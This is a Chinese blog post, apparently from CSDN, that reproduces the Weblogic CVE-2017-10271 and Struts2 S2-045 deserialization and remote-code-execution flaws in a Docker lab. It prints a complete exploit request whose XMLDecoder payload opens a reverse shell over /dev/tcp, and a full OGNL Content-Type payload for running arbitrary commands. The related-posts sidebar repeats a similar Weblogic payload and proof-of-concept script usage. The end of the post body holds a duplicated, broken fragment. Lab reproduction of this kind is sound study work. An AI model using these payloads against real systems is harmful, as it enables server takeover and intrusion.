Weblogic(CVE-2017-10271)与 Struts2(s2-045) 反序列化漏洞复现

最新推荐文章于 2024-06-09 18:24:15 发布
置顶 最新推荐文章于 2024-06-09 18:24:15 发布
阅读量313 收藏 1
点赞数 4
分类专栏: 漏洞复现 文章标签: struts java 后端 网络安全 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45953122/article/details/132819061
版权

文章目录

Java 反序列化漏洞复现

weblogic

Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)

​ Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

参考链接:

  • https://www.exploit-db.com/exploits/43458/
  • https://paper.seebug.org/487/
  • [https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices组件反序列化漏洞分析.md](https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic WLS-WebServices组件反序列化漏洞分析.md)
  • http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html

环境搭建

启动测试环境:

sudo docker-compose up -d

image-20230905160825548

等待一段时间,访问http://10.9.75.58:7001/即可看到一个404页面,说明weblogic已成功启动:

image-20230905160918223

漏洞复现

发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.9.75.58:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/10.9.75.58/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

成功获取shell:

image-20230905161843055

Struts2(s2-045)

S2-045 Remote Code Execution Vulnerablity

Struts2是什么
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与ServletAPI完全脱离开,所以Struts 2可以理解为WebWork的更新产品。虽然从Struts 1到Struts 2有着非常大的变化,但是相对于WebWork,Struts 2的变化很小。

说明内容
漏洞编号CVE- 2017- 5638
漏洞名称Struts2(s2-045)远程命令执行漏洞
漏洞评级高危
漏洞描述获取WEB路径,任意命令执行,反弹shell和文件上传
修复方案升级组件
打补丁
上设备

环境搭建

启动测试环境:

sudo docker-compose up -d

image-20230906185719426

访问10.9.75.58:8080页面:

image-20230906185808247

漏洞复现

s2-045漏洞形成分析:

CEV编号:CVE-2017-5638
POST请求发送数据
功能:获取WEB路径,任意命令执行,反弹shell和文件上传

漏洞检测:

使用nacs 扫描漏洞,先进入nacs执行目录:

cd /tools/nacs/0.0.3/nacs_linux_amd64

sudo ./nacs -h 10.9.75.58 -pa 8080

image-20230906194649605

漏洞利用
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data

使用bp抓包

image-20230906200131026

右键发送到重发器,然后修改为POST请求

image-20230906200233088

然后将漏洞利用代码复制到Content-Type中,发包即可

image-20230906200436256

输入我们的漏洞利用代码:

"%{(#xxx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"pwd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

结果:

image-20230906200803857

.getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"


结果:

[外链图片转存中...(img-LAt7zGPA-1694443187651)]
g_h_i
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
s2-045 java_S2-045漏洞初步分析
weixin_39614831的博客
02-22 320
0x01 前言前几天刚分析完s2-032这个漏洞,今天又爆发了一个s2-045的漏洞,又是直接的命令执行,影响了struts2绝大多数的版本.官方给的漏洞公告在这里 https://cwiki.apache.org/confluence/display/WW/S2-045受影响版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 -Struts 2.5.10其...
struts2 S2-045漏洞
qzxdh的专栏
03-07 6311
Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。 漏洞编号:  CVE-2017-5638 漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞 官方评级: 高危 漏洞描述:
Struts2远程命令执行漏洞 S2-045 源码分析
沧海一粟
03-08 9263
Struts2 又爆OGNL的高危漏洞S-045,又是OGNL的漏洞漏洞分析1. Struts 的上传request在上传文件里,Struts默认使用的是common upload 的上传组件, 为了能被action访问到上传的文件,通常会重新封装request,  Spring也是这么做。JakartaStreamMultiPartRequest.java中 public void parse(...
s2-045漏洞分析
Exploit的小站~
05-10 1万+
这个分析写的我有点汗颜,强烈建议抵制struts2,改为更加可靠的SpringMVC。 背景是,Struts2默认处理multipart报文的解析器是jakarta,是这个组件出了问题。 该组件定义在了struts-default.xml中,因此,只要不修改parser,并且版本在受影响范围内,肯定是有问题的。 令我非常疑惑的是,一个content-type怎么就能用ognl解析...
Web框架漏洞--Struts2 漏洞S2-045
qq_54713392的博客
05-08 1299
Web框架漏洞Struts2 漏洞S2-045 漏洞原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)使用vulhub靶场,进入到s2-045漏洞目录下 开启s2-045环境 执行命令:docker-compose
CVE-2017-10271 Weblogic序列漏洞补丁(FMJJ)
01-09
Weblogic序列漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
Weblogic+XML序列漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 序列漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
Weblogic漏洞CVE -2017-10271解决方案-附件资源
03-02
Weblogic漏洞CVE -2017-10271解决方案-附件资源
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
CVE-2017-10271 Weblogic序列漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
weblogic 补丁 序列补丁 。己已经打上补丁了。欢迎下载
Struts2 最新高危漏洞详解
热门推荐
m0_37630565的博客
03-13 2万+
由于计算机起源于美国,因此很多新兴技术和框架也都出于美国的一些大公司。虽然国内的BAT也在开源技术上有一些贡献,但目前来说还是比较缺少用户来支持。这也就导致了国内大部分互联网公司大量的依赖国外的技术。如果某些开源框架出了高危漏洞,就将影响一大批中国互联网公司。 最近 Struts2 又爆出了一个高危漏洞,据说影响了大半个中国互联网。涵盖金融、教育、医疗、电商等各个行业。哪么这个高危漏洞
s2-045 java_Struts2爆远程代码执行漏洞(S2-045),附POC | 极安全-JiSec
weixin_36265390的博客
02-12 257
今天凌晨,安全研究员Nike Zheng在Struts2上发一个高危漏洞(漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2...
热门框架漏洞--Struts2
jxy158212的博客
02-21 1096
Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。struts框架本身分为三个部分:核心控制器FilterDispatcher、业务控制器Action和用户实的企业业务逻辑组件随着整体框架的补丁完善,在想挖掘新的Struts2漏洞会比以前困难很多,从实际了解的情况来看,大部分用户早就修了历史的高危漏洞。目前在做渗透测试时,Struts2漏洞主要也是碰碰运气,或者是打到内网之后用来攻击没打补丁的系统会比较有效。
S2-045 远程代码执行漏洞CVE-2017-5638)
qq_43665434的博客
03-28 915
S2-045 远程代码执行漏洞CVE-2017-5638) ​ struts2是基于MVC设计模式的Java Web框架技术之一,struts2框架按照MVC的设计思想把Java Web应用程序分为控制层,包括核心控制器FilterDispatcher和业务控制器Action,模型层,包括业务逻辑组件和数据库访问组件,视图层,包括HTML、JSP、struts2标签等。 The Jakarta Multipart parser in Apache Struts 2 2.3.x before
java struts2 漏洞合集
whatday的专栏
08-31 3744
目录 一、S2-001 二、S2-005 三、S2-007 四、S2-008 五、S2-009 六、S2-012 七、S2-013 八、S2-015 九、S2-016 十、S2-045 十一、S2-048 十二、S2-052 十三、S2-053 十四、S2-057 十五、S2-019 十六、S2-devMode Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
简单的项目部署脚本(转载)
u010230019的博客
06-09 649
有些项目团队喜欢使用docker启动java服务,那么我们同样可以将上述脚本稍做改造,来实基于shell+docker的简单项目部署能力。可以将核心节点的错误或者失败内容通过webhook发送到对应的告警平台,比如钉钉、飞书机器人等。把~/.ssh/id_rsa.pub内容添加到远程仓库的ssh秘钥中。执行start.sh脚本打包部署。start.sh脚本内容。
Java——简单图书管理系统
最新发布
m0_74100417的博客
06-09 1437
数据类型变量iffor数组方法类和对象封装继承多态抽象类和接口今天就是把上述知识点全部都用起来 图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理
修改菜品——后端Java
weixin_53717695的博客
06-09 462
修改菜品——后端Java
cve-2017-10271漏洞
06-28
### 回答1: CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来漏洞。但是,我们不建议未经授权的人员进行漏洞,因为这可能会导致系统被攻击者入侵。如果您需要测试您的系统是否受到该漏洞的影响,请咨询安全专家或厂商提供的安全补丁。 ### 回答2: CVE-2017-10271漏洞是Oracle WebLogic Server的一个远程代码执行漏洞,攻击者可以通过构造特定的HTTP请求来向受影响的WebLogic服务器发送恶意代码,在未经授权的情况下执行任意命令或获取服务器操作权限。 漏洞需要以下步骤: 1. 确定漏洞影响的WebLogic版本,CVE-2017-10271漏洞影响的版本为12.1.2.0、12.1.3.0、12.2.1.0、12.2.1.1和12.2.1.2,若WebLogic版本符合以上版本则可以进行后续漏洞操作。 2.通过漏洞利用工具Metasploit或手工构造特定的HTTP请求向受影响的WebLogic服务器发送恶意代码,触发漏洞,远程代码执行。 3.构造特定的HTTP请求需要以下信息: - 目标WebLogic服务器的IP地址和端口号。 - WebLogic管理员账户的用户名和密码,用于获取控制台访问权限。 - 漏洞利用代码,用于构造HTTP请求并发送到目标WebLogic服务器。 其中,漏洞利用代码结构大致如下: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target_weblogic_server_ip:target_port Content-Type: text/xml; charset=utf-8 Content-Length: 800 <?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo "";whoami;id;uname -a;echo "> /tmp/shell;sudo chmod 777 /tmp/shell;/tmp/shell</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> 这段代码用于请求WebLogic服务器上的CoordinatorPortType服务,执行恶意代码,获取远程服务器的操作权限。其中,</string>字符串后面的内容是要在目标服务器上执行的命令。 4.成功漏洞后,攻击者可以通过远程命令执行获取服务器操作权限,对受影响的服务器进行攻击、篡改或窃取敏感数据等恶意行为。 因此,WebLogic管理员应当及时采取措施,升级至最新版本,关闭不必要的端口,增强安全性,以保护WebLogic服务器不受恶意攻击。 ### 回答3: CVE-2017-10271是一个Oracle WebLogic Server中的远程执行代码漏洞漏洞影响Oracle WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.1和12.2.1.2版本。 漏洞步骤如下: 步骤一:下载漏洞工具 首先要下载漏洞工具weblogic-CNVD-2019-48814: git clone https://github.com/tdy218/OracleWeblogic-CNVD-C-2019-48814.git 步骤二:搭建漏洞环境 安装Oracle WebLogic Server 12.2.1.3.0,安装过程略过。在安装完成后,启动Oracle WebLogic Server管理服务: ${ORACLE_HOME}/user_projects/domains/base_domain/bin/startWebLogic.sh 启动管理服务后,访问http://localhost:7001/console,进入控制台界面,输入管理员账号密码,进入控制台主页。 步骤三:运行漏洞利用脚本 进入weblogic-CNVD-2019-48814目录,运行poc.py脚本,如下所示: python poc.py http://localhost:7001 begin ${arbitary command} 其中,http://localhost:7001是WebLogic Server地址,${arbitary command}是任意需要执行的命令,例如: python poc.py http://localhost:7001 begin ls 上述命令将列出当前目录下的文件列表。 漏洞利用成功后,可以看到攻击者执行的命令结果。 除了使用上述脚本之外,攻击者还可以手动利用该漏洞,具体步骤可以查看漏洞详情。 总结: CVE-2017-10271漏洞是一种影响Oracle WebLogic Server的远程执行代码漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。为了防止该漏洞的攻击,我们可以进行以下措施: 1. 及时升级Oracle WebLogic Server版本,以防止攻击者利用漏洞; 2. 禁用T3协议,仅允许HTTPS连接; 3. 配置防火墙,限制WebLogic Server管理服务的访问来源; 4. 运行安全软件,及时发漏洞和攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值